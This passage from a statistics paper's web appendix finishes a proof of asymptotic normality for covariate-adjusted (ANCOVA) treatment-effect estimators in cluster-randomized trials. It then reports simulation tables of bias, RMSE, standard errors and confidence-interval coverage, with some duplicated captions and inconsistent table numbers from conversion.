(2021), we have \([\widetilde{\mathbf{X}}_{j}^{a}]_{l}=O_{p}(I^{-1/2})\), for \(a\in\mathcal{A}\) and \(l=1,\ldots,p\), where
\[\widetilde{\mathbf{X}}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\widetilde{\mathbf{X}}_{ij}^{a}}{\sum_{i=1}^{I}w_{ij}G_{ia}}.\]
This implies that \(\widetilde{\mathbf{X}}_{j}^{a}=\mathbf{O}_{p}(I^{-1/2})\), for \(a\in\mathcal{A}\). Using ANCOVA I as an example (results for the other models follow analogously), we have
\[\overline{u}_{j}^{a}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\overline{U}_{ij}^{a}}{\sum_{i=1}^{I}w_{ij}G_{ia}}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\left(\overline{Y}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\widehat{\mathbf{\gamma}}\right)}{\sum_{i=1}^{I}w_{ij}G_{ia}}=\frac{\sum_{i=1}^{I}w_{ij}G_{ia}\left\{\widetilde{U}_{ij}^{a}-\widetilde{\mathbf{X}}_{ij}\left(\widehat{\mathbf{\gamma}}-\mathbf{\gamma}\right)\right\}}{\sum_{i=1}^{I}w_{ij}G_{ia}}=\widetilde{u}_{j}^{a}-\widetilde{\mathbf{X}}_{j}^{a}\left(\widehat{\mathbf{\gamma}}-\mathbf{\gamma}\right).\]
Since \(\widehat{\mathbf{\gamma}}\xrightarrow{p}\mathbf{\gamma}\), we have \(\widetilde{\mathbf{X}}_{j}^{a}\left(\widehat{\mathbf{\gamma}}-\mathbf{\gamma}\right)=o_{p}(I^{-1/2})\), which indicates that \(\widehat{\tau}^{w}\) and \(\widetilde{\tau}^{w}\) have the same asymptotic distribution, i.e.,
\[\frac{\widehat{\tau}^{w}-\tau^{w}}{\sqrt{\mathbf{\varpi}^{\prime}\mathbf{\Sigma}_{\tau}\mathbf{\varpi}}}\xrightarrow{d}\mathcal{N}\left(0,1\right),\]
which concludes the proof of Theorem 1.

## Web Appendix A3 Additional Simulation Results

### Web Appendix A3.1 Simulation Study I

Figure A1: Relative bias (BIAS) of proposed estimators from simulation study I with 1,000 simulation replications. UN = unadjusted, AN I-IV = ANCOVA I-IV.

### Web Appendix A3.2 Simulation Study II

#### Web Appendix A3.2.1 When the number of clusters \(I=18\)
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.152 & 0.173 & 0.201 & 0.164 & 0.951 & 0.911 \\ & AN I & -0.001 & 0.092 & 0.121 & 0.147 & 0.121 & 0.966 & 0.929 \\ & AN II & -0.005 & 0.106 & 0.132 & 0.144 & 0.118 & 0.941 & 0.890 \\ & AN III & -0.002 & 0.086 & 0.118 & 0.112 & 0.093 & 0.895 & 0.839 \\ & AN IV & -0.015 & 0.098 & 0.126 & 0.091 & 0.072 & 0.816 & 0.700 \\ \hline Scenario II & UN & -0.011 & 0.206 & 0.233 & 0.273 & 0.223 & 0.969 & 0.911 \\ & AN I & -0.005 & 0.121 & 0.169 & 0.186 & 0.154 & 0.937 & 0.888 \\ & AN II & -0.007 & 0.182 & 0.218 & 0.205 & 0.175 & 0.860 & 0.817 \\ & AN III & -0.003 & 0.114 & 0.162 & 0.149 & 0.123 & 0.902 & 0.848 \\ & AN IV & -0.002 & 0.164 & 0.211 & 0.111 & 0.089 & 0.703 & 0.617 \\ \hline Scenario III & UN & -0.005 & 0.165 & 0.196 & 0.226 & 0.184 & 0.958 & 0.913 \\ & AN I & -0.002 & 0.110 & 0.150 & 0.183 & 0.150 & 0.972 & 0.932 \\ & AN II & -0.005 & 0.129 & 0.163 & 0.178 & 0.148 & 0.946 & 0.896 \\ & AN III & 0.002 & 0.107 & 0.149 & 0.154 & 0.127 & 0.942 & 0.888 \\ & AN IV & 0.001 & 0.122 & 0.161 & 0.133 & 0.107 & 0.871 & 0.785 \\ \hline Scenario IV & UN & -0.024 & 0.162 & 0.183 & 0.208 & 0.169 & 0.969 & 0.933 \\ & AN I & -0.013 & 0.110 & 0.143 & 0.154 & 0.126 & 0.981 & 0.953 \\ & AN II & -0.018 & 0.124 & 0.156 & 0.152 & 0.126 & 0.956 & 0.913 \\ & AN III & -0.007 & 0.104 & 0.137 & 0.119 & 0.098 & 0.932 & 0.871 \\ & AN IV & -0.005 & 0.116 & 0.148 & 0.101 & 0.083 & 0.847 & 0.772 \\ \hline \hline \end{tabular} \end{table} Table A2: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.140 & 0.163 & 0.193 & 0.158 & 0.967 & 0.924 \\ & AN I & -0.002 & 0.079 & 0.114 & 0.143 & 0.117 & 0.976 & 0.940 \\ & AN II & -0.007 & 0.096 & 0.126 & 0.140 & 0.115 & 0.952 & 0.903 \\ & AN III & -0.001 & 0.073 & 0.109 & 0.108 & 0.089 & 0.918 & 0.850 \\ & AN IV & -0.012 & 0.084 & 0.117 & 0.090 & 0.072 & 0.833 & 0.749 \\ \hline Scenario II & UN & -0.015 & 0.192 & 0.213 & 0.248 & 0.202 & 0.957 & 0.906 \\ & AN I & -0.008 & 0.107 & 0.144 & 0.167 & 0.138 & 0.960 & 0.917 \\ & AN II & -0.010 & 0.142 & 0.172 & 0.173 & 0.147 & 0.903 & 0.862 \\ & AN III & -0.007 & 0.125 & 0.159 & 0.156 & 0.129 & 0.919 & 0.864 \\ & AN IV & -0.011 & 0.132 & 0.168 & 0.110 & 0.088 & 0.774 & 0.680 \\ \hline Scenario III & UN & -0.010 & 0.165 & 0.195 & 0.222 & 0.181 & 0.956 & 0.903 \\ & AN I & -0.007 & 0.116 & 0.153 & 0.182 & 0.149 & 0.964 & 0.925 \\ & AN II & -0.009 & 0.133 & 0.165 & 0.177 & 0.146 & 0.944 & 0.900 \\ & AN III & -0.008 & 0.112 & 0.150 & 0.154 & 0.127 & 0.948 & 0.882 \\ & AN IV & -0.018 & 0.124 & 0.160 & 0.131 & 0.104 & 0.880 & 0.784 \\ \hline Scenario IV & UN & -0.168 & 0.155 & 0.176 & 0.202 & 0.165 & 0.969 & 0.929 \\ & AN I & -0.161 & 0.105 & 0.137 & 0.154 & 0.126 & 0.982 & 0.950 \\ & AN II & -0.176 & 0.120 & 0.150 & 0.151 & 0.125 & 0.961 & 0.916 \\ & AN III & -0.155 & 0.100 & 0.132 & 0.120 & 0.099 & 0.937 & 0.889 \\ & AN IV & -0.172 & 0.109 & 0.140 & 0.102 & 0.082 & 0.880 & 0.791 \\ \hline \hline \end{tabular} \end{table} Table A3: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.138 & 0.161 & 0.194 & 0.158 & 0.968 & 0.929 \\ & AN I & -0.001 & 0.078 & 0.113 & 0.145 & 0.118 & 0.977 & 0.947 \\ & AN II & -0.006 & 0.093 & 0.124 & 0.142 & 0.117 & 0.962 & 0.912 \\ & AN III & -0.001 & 0.072 & 0.109 & 0.109 & 0.089 & 0.922 & 0.863 \\ & AN IV & -0.002 & 0.083 & 0.117 & 0.091 & 0.073 & 0.841 & 0.756 \\ \hline Scenario II & UN & -0.007 & 0.188 & 0.210 & 0.247 & 0.202 & 0.960 & 0.913 \\ & AN I & 0.003 & 0.104 & 0.142 & 0.169 & 0.140 & 0.965 & 0.926 \\ & AN II & 0.005 & 0.140 & 0.171 & 0.176 & 0.150 & 0.908 & 0.867 \\ & AN III & 0.004 & 0.120 & 0.155 & 0.159 & 0.132 & 0.937 & 0.881 \\ & AN IV & 0.012 & 0.130 & 0.167 & 0.114 & 0.091 & 0.801 & 0.719 \\ \hline Scenario III & UN & 0.015 & 0.162 & 0.192 & 0.224 & 0.183 & 0.964 & 0.910 \\ & AN I & 0.021 & 0.114 & 0.151 & 0.186 & 0.152 & 0.971 & 0.930 \\ & AN II & 0.028 & 0.130 & 0.163 & 0.181 & 0.149 & 0.949 & 0.895 \\ & AN III & 0.019 & 0.110 & 0.148 & 0.158 & 0.130 & 0.945 & 0.902 \\ & AN IV & 0.037 & 0.124 & 0.159 & 0.134 & 0.107 & 0.876 & 0.779 \\ \hline Scenario IV & UN & 0.078 & 0.151 & 0.174 & 0.205 & 0.167 & 0.976 & 0.945 \\ & AN I & 0.087 & 0.103 & 0.137 & 0.158 & 0.129 & 0.981 & 0.950 \\ & AN II & 0.082 & 0.117 & 0.150 & 0.156 & 0.129 & 0.958 & 0.920 \\ & AN III & 0.096 & 0.098 & 0.133 & 0.124 & 0.102 & 0.929 & 0.886 \\ & AN IV & 0.111 & 0.108 & 0.141 & 0.106 & 0.085 & 0.852 & 0.770 \\ \hline \hline \end{tabular} \end{table} Table A4: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. #### Web Appendix a3.2.2 When the number of clusters \(I=60\) Table A5: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{5-8} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.082 & 0.090 & 0.107 & 0.102 & 0.978 & 0.970 \\ & AN I & -0.002 & 0.049 & 0.063 & 0.081 & 0.077 & 0.985 & 0.981 \\ & AN II & -0.003 & 0.054 & 0.067 & 0.083 & 0.079 & 0.984 & 0.977 \\ & AN III & -0.002 & 0.047 & 0.062 & 0.065 & 0.062 & 0.948 & 0.938 \\ & AN IV & -0.006 & 0.049 & 0.063 & 0.061 & 0.058 & 0.931 & 0.921 \\ \hline Scenario II & UN & -0.003 & 0.111 & 0.131 & 0.140 & 0.133 & 0.960 & 0.942 \\ & AN I & 0.001 & 0.065 & 0.092 & 0.100 & 0.095 & 0.966 & 0.960 \\ & AN II & 0.002 & 0.094 & 0.113 & 0.116 & 0.112 & 0.933 & 0.932 \\ & AN III & 0.001 & 0.062 & 0.090 & 0.083 & 0.079 & 0.916 & 0.905 \\ & AN IV & 0.001 & 0.055 & 0.086 & 0.070 & 0.066 & 0.867 & 0.855 \\ \hline Scenario III & UN & -0.004 & 0.095 & 0.111 & 0.118 & 0.112 & 0.952 & 0.942 \\ & AN I & -0.001 & 0.062 & 0.084 & 0.096 & 0.091 & 0.972 & 0.963 \\ & AN II & -0.002 & 0.068 & 0.088 & 0.098 & 0.093 & 0.962 & 0.955 \\ & AN III & 0.001 & 0.059 & 0.081 & 0.083 & 0.079 & 0.956 & 0.941 \\ & AN IV & 0.001 & 0.060 & 0.083 & 0.079 & 0.076 & 0.938 & 0.922 \\ \hline Scenario IV & UN & 0.001 & 0.087 & 0.097 & 0.109 & 0.103 & 0.966 & 0.955 \\ & AN I & 0.002 & 0.058 & 0.073 & 0.083 & 0.079 & 0.991 & 0.980 \\ & AN II & 0.002 & 0.064 & 0.078 & 0.086 & 0.082 & 0.980 & 0.974 \\ & AN III & 0.003 & 0.055 & 0.071 & 0.066 & 0.063 & 0.921 & 0.913 \\ & AN IV & 0.004 & 0.058 & 0.074 & 0.064 & 0.061 & 0.905 & 0.894 \\ \hline \hline \end{tabular} \end{table} Table A5: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.076 & 0.085 & 0.102 & 0.097 & 0.980 & 0.971 \\ & AN I & -0.002 & 0.042 & 0.058 & 0.077 & 0.073 & 0.985 & 0.979 \\ & AN II & -0.003 & 0.048 & 0.062 & 0.080 & 0.076 & 0.985 & 0.977 \\ & AN III & -0.002 & 0.040 & 0.056 & 0.060 & 0.057 & 0.952 & 0.945 \\ & AN IV & -0.005 & 0.041 & 0.057 & 0.057 & 0.054 & 0.944 & 0.926 \\ \hline Scenario II & UN & -0.004 & 0.103 & 0.117 & 0.127 & 0.121 & 0.964 & 0.947 \\ & AN I & -0.001 & 0.058 & 0.080 & 0.089 & 0.085 & 0.969 & 0.962 \\ & AN II & 0.001 & 0.074 & 0.091 & 0.097 & 0.093 & 0.943 & 0.940 \\ & AN III & -0.001 & 0.067 & 0.087 & 0.087 & 0.083 & 0.944 & 0.936 \\ & AN IV & -0.002 & 0.052 & 0.075 & 0.068 & 0.064 & 0.918 & 0.898 \\ \hline Scenario III & UN & -0.006 & 0.094 & 0.110 & 0.117 & 0.111 & 0.956 & 0.944 \\ & AN I & -0.004 & 0.064 & 0.084 & 0.097 & 0.092 & 0.973 & 0.967 \\ & AN II & -0.006 & 0.070 & 0.089 & 0.098 & 0.093 & 0.964 & 0.953 \\ & AN III & -0.004 & 0.061 & 0.082 & 0.084 & 0.080 & 0.956 & 0.939 \\ & AN IV & -0.008 & 0.064 & 0.084 & 0.080 & 0.076 & 0.928 & 0.913 \\ \hline Scenario IV & UN & -0.001 & 0.083 & 0.092 & 0.106 & 0.101 & 0.973 & 0.967 \\ & AN I & -0.001 & 0.055 & 0.069 & 0.083 & 0.079 & 0.990 & 0.984 \\ & AN II & -0.001 & 0.061 & 0.075 & 0.085 & 0.081 & 0.984 & 0.980 \\ & AN III & -0.001 & 0.052 & 0.068 & 0.067 & 0.063 & 0.938 & 0.922 \\ & AN IV & -0.003 & 0.055 & 0.071 & 0.064 & 0.061 & 0.918 & 0.900 \\ \hline \hline \end{tabular} \end{table} Table 6: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.001 & 0.074 & 0.084 & 0.101 & 0.096 & 0.984 & 0.973 \\ & AN I & -0.002 & 0.041 & 0.057 & 0.077 & 0.073 & 0.986 & 0.980 \\ & AN II & -0.003 & 0.047 & 0.061 & 0.079 & 0.076 & 0.987 & 0.981 \\ & AN III & -0.002 & 0.039 & 0.056 & 0.060 & 0.057 & 0.952 & 0.948 \\ & AN IV & -0.005 & 0.040 & 0.057 & 0.057 & 0.054 & 0.945 & 0.936 \\ \hline Scenario II & UN & -0.002 & 0.101 & 0.115 & 0.126 & 0.120 & 0.954 & 0.944 \\ & AN I & 0.003 & 0.058 & 0.079 & 0.089 & 0.085 & 0.971 & 0.962 \\ & AN II & 0.005 & 0.074 & 0.091 & 0.097 & 0.093 & 0.951 & 0.945 \\ & AN III & 0.003 & 0.066 & 0.086 & 0.087 & 0.083 & 0.953 & 0.940 \\ & AN IV & 0.005 & 0.053 & 0.075 & 0.069 & 0.065 & 0.920 & 0.900 \\ \hline Scenario III & UN & -0.001 & 0.093 & 0.109 & 0.116 & 0.110 & 0.957 & 0.942 \\ & AN I & 0.003 & 0.063 & 0.084 & 0.097 & 0.092 & 0.976 & 0.967 \\ & AN II & 0.004 & 0.069 & 0.088 & 0.098 & 0.094 & 0.966 & 0.959 \\ & AN III & 0.003 & 0.061 & 0.082 & 0.085 & 0.080 & 0.955 & 0.947 \\ & AN IV & 0.008 & 0.063 & 0.084 & 0.081 & 0.077 & 0.934 & 0.927 \\ \hline Scenario IV & UN & 0.006 & 0.083 & 0.092 & 0.106 & 0.101 & 0.970 & 0.963 \\ & AN I & 0.007 & 0.056 & 0.070 & 0.084 & 0.080 & 0.985 & 0.980 \\ & AN II & 0.009 & 0.062 & 0.075 & 0.086 & 0.082 & 0.978 & 0.968 \\ & AN III & 0.007 & 0.054 & 0.068 & 0.068 & 0.065 & 0.931 & 0.918 \\ & AN IV & 0.013 & 0.056 & 0.071 & 0.065 & 0.062 & 0.911 & 0.898 \\ \hline \hline \end{tabular} \end{table} Table 10: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study II comparing performances of five estimators, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=60\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
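For reference, the evaluation metrics reported in the tables (BIAS, RMSE, ESE, ASE, and coverage) can be computed from simulation output with a few lines. The sketch below is generic: the `summarize` helper and the fabricated replication arrays are ours, not the actual simulation results.

```python
import numpy as np

def summarize(est, se, truth, z=1.96):
    """BIAS (relative), RMSE, ESE, ASE, and empirical coverage of 95% CIs."""
    est, se = np.asarray(est), np.asarray(se)
    bias = (est.mean() - truth) / truth        # relative bias
    rmse = np.sqrt(np.mean((est - truth) ** 2))
    ese = est.std(ddof=1)                      # empirical standard error
    ase = se.mean()                            # average (estimated) standard error
    cover = np.mean((est - z * se <= truth) & (truth <= est + z * se))
    return bias, rmse, ese, ase, cover

# Hypothetical output from 1,000 replications: point estimates and standard errors.
rng = np.random.default_rng(4)
truth = 0.5
est = truth + rng.normal(scale=0.1, size=1000)
se = np.full(1000, 0.1)
print(summarize(est, se, truth))
```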
Web Appendix A4 Additional Simulation Results with Cluster-Period Cell Size as an Additional Covariate Web Appendix A4.1 Simulation Study I \begin{table} \begin{tabular}{c c c c c c c c c c} \hline \hline & & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{6-9} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.031 & 0.153 & 0.174 & 0.207 & 0.169 & 0.965 & 0.913 \\ & AN I & -0.018 & 0.085 & 0.118 & 0.152 & 0.125 & 0.978 & 0.941 \\ & AN II & -0.032 & 0.117 & 0.141 & 0.146 & 0.123 & 0.927 & 0.884 \\ & AN III & 0.002 & 0.074 & 0.111 & 0.106 & 0.087 & 0.904 & 0.849 \\ & AN IV & 0.023 & 0.232 & 0.240 & 0.070 & 0.077 & 0.626 & 0.609 \\ \hline 30 & UN & -0.022 & 0.121 & 0.136 & 0.156 & 0.139 & 0.965 & 0.942 \\ & AN I & -0.008 & 0.068 & 0.094 & 0.115 & 0.104 & 0.981 & 0.962 \\ & AN II & -0.021 & 0.091 & 0.111 & 0.118 & 0.107 & 0.941 & 0.928 \\ & AN III & 0.005 & 0.060 & 0.088 & 0.083 & 0.074 & 0.920 & 0.879 \\ & AN IV & 0.016 & 0.073 & 0.098 & 0.067 & 0.061 & 0.804 & 0.760 \\ \hline 60 & UN & -0.006 & 0.081 & 0.090 & 0.109 & 0.103 & 0.981 & 0.972 \\ & AN I & -0.002 & 0.045 & 0.061 & 0.082 & 0.078 & 0.990 & 0.985 \\ & AN II & -0.007 & 0.058 & 0.071 & 0.087 & 0.083 & 0.976 & 0.971 \\ & AN III & 0.005 & 0.040 & 0.058 & 0.060 & 0.057 & 0.950 & 0.940 \\ & AN IV & 0.010 & 0.042 & 0.059 & 0.054 & 0.052 & 0.915 & 0.903 \\ \hline 120 & UN & -0.002 & 0.059 & 0.066 & 0.076 & 0.074 & 0.971 & 0.967 \\ & AN I & -0.002 & 0.033 & 0.046 & 0.057 & 0.056 & 0.982 & 0.980 \\ & AN II & -0.005 & 0.042 & 0.052 & 0.062 & 0.060 & 0.975 & 0.972 \\ & AN III & 0.002 & 0.029 & 0.044 & 0.042 & 0.041 & 0.939 & 0.934 \\ & AN IV & 0.004 & 0.030 & 0.044 & 0.040 & 0.039 & 0.918 & 0.915 \\ \hline \hline \end{tabular} \end{table} Table A9: Results for the period-average treatment effect (\(\tau^{period}\)) from simulation study I comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{2}{c}{ASE} & \multicolumn{2}{c}{Coverage} \\ \cline{4-9} \(I\) & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline 18 & UN & -0.012 & 0.149 & 0.171 & 0.210 & 0.171 & 0.963 & 0.923 \\ & AN I & 0.003 & 0.083 & 0.117 & 0.154 & 0.127 & 0.978 & 0.956 \\ & AN II & 0.016 & 0.113 & 0.139 & 0.149 & 0.125 & 0.939 & 0.888 \\ & AN III & 0.001 & 0.073 & 0.111 & 0.107 & 0.089 & 0.907 & 0.855 \\ & AN IV & 0.030 & 0.230 & 0.240 & 0.071 & 0.076 & 0.644 & 0.618 \\ \hline 30 & UN & -0.014 & 0.119 & 0.134 & 0.157 & 0.140 & 0.971 & 0.946 \\ & AN I & 0.006 & 0.068 & 0.093 & 0.116 & 0.104 & 0.977 & 0.965 \\ & AN II & 0.009 & 0.090 & 0.110 & 0.119 & 0.108 & 0.952 & 0.935 \\ & AN III & 0.006 & 0.060 & 0.087 & 0.083 & 0.074 & 0.916 & 0.886 \\ & AN IV & 0.020 & 0.073 & 0.098 & 0.067 & 0.061 & 0.809 & 0.769 \\ \hline 60 & UN & -0.001 & 0.079 & 0.089 & 0.109 & 0.103 & 0.980 & 0.975 \\ & AN I & 0.005 & 0.044 & 0.060 & 0.082 & 0.078 & 0.991 & 0.986 \\ & AN II & 0.007 & 0.056 & 0.070 & 0.087 & 0.083 & 0.984 & 0.980 \\ & AN III & 0.005 & 0.039 & 0.057 & 0.060 & 0.057 & 0.954 & 0.944 \\ & AN IV & 0.011 & 0.041 & 0.059 & 0.054 & 0.052 & 0.934 & 0.915 \\ \hline 120 & UN & 0.001 & 0.058 & 0.066 & 0.076 & 0.074 & 0.969 & 0.967 \\ & AN I & 0.011 & 0.032 & 0.046 & 0.057 & 0.056 & 0.984 & 0.982 \\ & AN II & 0.002 & 0.041 & 0.053 & 0.062 & 0.060 & 0.973 & 0.969 \\ & AN III & 0.001 & 0.029 & 0.043 & 0.042 & 0.041 & 0.931 & 0.924 \\ & AN IV & 0.004 & 0.029 & 0.044 & 0.040 & 0.039 & 0.919 & 0.910 \\ \hline \hline \end{tabular} \end{table} Table 10: Results for the cell-average treatment effect (\(\tau^{cell}\)) from simulation study I comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV. Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. Figure A2: Relative bias (BIAS) of proposed estimators from simulation study I with 1,000 simulation replications with cell size as a covariate. UN = unadjusted, AN I-IV = ANCOVA I-IV. ### Web Appendix A4.2 Simulation Study II #### Web Appendix A4.2.1 When the number of clusters \(I=18\) Table A11: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
\begin{table} \begin{tabular}{c c c c c c c c c} \hline \hline & & & & & \multicolumn{3}{c}{ASE} & \multicolumn{3}{c}{Coverage} \\ \cline{4-9} Scenarios & Estimator & BIAS & RMSE & ESE & DB & CRSE & DB & CRSE \\ \hline Scenario I & UN & 0.005 & 0.152 & 0.173 & 0.201 & 0.164 & 0.951 & 0.911 \\ & AN I & -0.001 & 0.092 & 0.121 & 0.146 & 0.119 & 0.963 & 0.927 \\ & AN II & -0.006 & 0.107 & 0.132 & 0.135 & 0.111 & 0.926 & 0.870 \\ & AN III & -0.002 & 0.087 & 0.119 & 0.109 & 0.091 & 0.883 & 0.831 \\ & AN IV & -0.009 & 0.322 & 0.327 & 0.065 & 0.080 & 0.548 & 0.547 \\ \hline Scenario II & UN & -0.011 & 0.206 & 0.233 & 0.273 & 0.223 & 0.969 & 0.911 \\ & AN I & -0.007 & 0.122 & 0.170 & 0.179 & 0.150 & 0.920 & 0.873 \\ & AN II & -0.014 & 0.190 & 0.225 & 0.193 & 0.165 & 0.824 & 0.781 \\ & AN III & 0.003 & 0.109 & 0.161 & 0.129 & 0.107 & 0.867 & 0.793 \\ & AN IV & 0.008 & 0.346 & 0.366 & 0.064 & 0.077 & 0.380 & 0.378 \\ \hline Scenario III & UN & -0.005 & 0.165 & 0.196 & 0.226 & 0.184 & 0.958 & 0.913 \\ & AN I & -0.001 & 0.107 & 0.147 & 0.178 & 0.146 & 0.961 & 0.934 \\ & AN II & -0.014 & 0.137 & 0.170 & 0.171 & 0.143 & 0.926 & 0.895 \\ & AN III & 0.017 & 0.097 & 0.140 & 0.135 & 0.111 & 0.921 & 0.868 \\ & AN IV & 0.017 & 0.401 & 0.410 & 0.092 & 0.098 & 0.619 & 0.569 \\ \hline Scenario IV & UN & -0.024 & 0.162 & 0.183 & 0.208 & 0.169 & 0.969 & 0.933 \\ & AN I & -0.017 & 0.102 & 0.138 & 0.147 & 0.121 & 0.978 & 0.937 \\ & AN II & -0.036 & 0.133 & 0.161 & 0.144 & 0.121 & 0.919 & 0.871 \\ & AN III & 0.007 & 0.091 & 0.131 & 0.088 & 0.074 & 0.756 & 0.696 \\ & AN IV & 0.034 & 0.317 & 0.325 & 0.055 & 0.077 & 0.450 & 0.476 \\ \hline \hline \end{tabular} \end{table} Table A11: Results for the individual-average treatment effect (\(\tau^{ind}\)) from simulation study II comparing performances of five estimators with cell size as a covariate, UN = unadjusted, AN I-IV = ANCOVA I-IV, under the four scenarios. The number of clusters \(I=18\). Evaluation metrics: BIAS = relative bias; RMSE = root mean squared error; ESE = empirical standard error; ASE = average standard error, where, DB = standard errors via the design-based plug-in estimator, and CRSE = cluster-robust standard errors; Coverage = empirical coverage of 95% confidence intervals over 1,000 simulation replications. 
